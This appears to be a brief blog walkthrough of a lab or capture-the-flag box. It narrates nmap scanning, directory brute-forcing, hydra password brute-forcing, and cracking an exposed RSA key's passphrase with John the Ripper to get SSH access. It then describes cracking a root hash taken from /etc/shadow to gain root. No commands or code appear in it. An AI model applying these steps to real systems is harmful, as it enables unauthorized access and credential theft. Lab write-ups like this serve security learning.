Using John to crack an RSA Private key followed by privilege escalation to root
My initial nmap scan showed port 22 and 80 open
I then went into port 80 recon which gave me a simple server info page
Going towards a Directory brute force here to see if i can find any more info and I did. A admin page
But within this admin page, we have "not secure source code!" Whoo-Hoo
As well, 2 possible usernames, John and admin. (classic)
I tried a throw away attempt and received an error code, So i ran that error code in with my hydra brute forcing tool along with the admin name and was able to crack a password
We now have a password, Cool right?
A successful login gets me directly to an alert page from the developer, a RSA Private key. Big NO NO to have that out in the wild.
SO i grab that RSA Private key, make it into a file and run John the ripper against it to Give me a password.
We already know that port 22 SSH is open so lets use this to log in!
And whalaa
The user john is great, But lets go for root! We can see a root user key wihiin johns etc/shaow info
After copying this and running it against john i now how the root users password!
Password achieved. A simple switch user command gives us root login, and we are in
Keys to the castle!
Post a comment